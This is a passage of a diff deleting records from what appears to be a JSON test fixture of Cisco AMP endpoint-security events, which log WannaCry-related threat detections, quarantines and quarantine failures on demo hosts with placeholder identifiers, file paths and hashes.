Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
\ No newline at end of file
